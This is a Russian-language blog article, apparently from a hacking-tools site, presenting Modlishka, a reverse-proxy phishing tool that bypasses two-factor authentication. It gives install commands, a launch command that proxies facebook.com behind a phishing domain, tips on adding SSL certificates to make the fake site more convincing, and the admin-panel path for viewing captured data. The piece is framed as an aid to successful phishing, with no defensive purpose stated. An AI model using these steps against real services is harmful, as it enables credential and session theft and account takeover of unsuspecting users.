Взлом и проверка на уязвимости

Modlishka — инструмент для фишинга с обходом двухфакторной аутентификации

Modlishka — инструмент с открытым исходным кодом, который позволяет раскрыть потенциал фишинга и вывести его на новый уровень. Одной из главных особенностей инструмента является возможность обхода двухфакторной аутентификации, а в совокупности с гибкой настройкой — это дает возможность полностью контролировать трафик, который проходит через браузер цели.

Подписывайтесь на Telegram

Установка Modlishka

Чтобы установить Modlishka, загрузите репозиторий с github с помощью команды «go get», как показано ниже.

go get -u github.com/drk1wi/Modlishka

После этого перейдите в папку «go» и запустите файл make в зависимости от вашей ОС.

cd $GOPATH/go/src/github.com/drk1wi/Modlishka/

make

На данном этапе установка инструмента завершена.

Запуск и использование Modlishka

Для запуска прокси перейдите в папку «dist» и запустите скрипт.

cd dist/
./proxy -h

Запуск Modlishka на операционной системе Linux

При запуске видно, что имеется много различных вариантов. Вы можете создать свою собственную сертификацию SSL, используя
‘openssl‘, чтобы увеличить надежность и доверие к фишинговому сайту и увеличить шансы на успех. Также присутствует возможность регистрации доменного имени. Есть варианты, с помощью которых можно обойти некоторые меры безопасности, такие как анти-SSRF.

Пример для запуска атаки с доменом Facebook.

Просто введите команду ниже для того, чтобы задать целевой сайт, после чего можно увидеть прокси в действии. Опцию phisingDomain необходимо изменить в соответствии с потребностями. Если хотите использовать ‘loopback.modlishka.io‘, как показано ниже, нужно изменить файл ‘index.html‘ внутри папки apache (/var/www/), чтобы он соответствовал нужному шаблону.

./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80

Запуск сканирования и атаки с помощью фишингового сайта

После проведения атаки нужно перейти в панель администратора, чтобы увидеть все полученные данные. Введите следующую команду в браузере.

http://loopback.modlishka.io/SayHello2Modlishka/

Заключение

Modlishka очень мощный инструмент, для изучения которого нужно потратить немного времени. Он предоставляет большой функционал, включая регистрацию доменного имени и подключения SSL-сертификата, что в разы увеличивает шансы на успех проведения фишинговых атак.

Мы уже писали, про обход двухфакторной аутентификации с помощью Modlishka. Оставляйте свои комментарии и мнение о данном инструменте.

Related Articles

Обзор инструмента для кибербезопасности Spyse

14.05.2020

Snitch — инструмент сбора информация

03.11.2019

UBoat — доказательство концепции проекта PoC HTTP Botnet

27.10.2019

Cangibrina — инструмент поиска панели администратора

21.10.2019

BBQSQL — среда для SQL инъекций

11.10.2019

HTTrack — копирование сайтов для автономного просмотра

06.10.2019

BloodHound – взлом активного каталога доверительных отношений

29.09.2019

HiddenWall — создание скрытых модулей ядра Linux для защиты сервера

18.09.2019

ZigDiggity — набор инструментов для взлома ZigBee

16.09.2019

ZARP — инструмент сетевой атаки

15.09.2019

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button
Adblock
detector . 210 запросов. 0,162 секунд.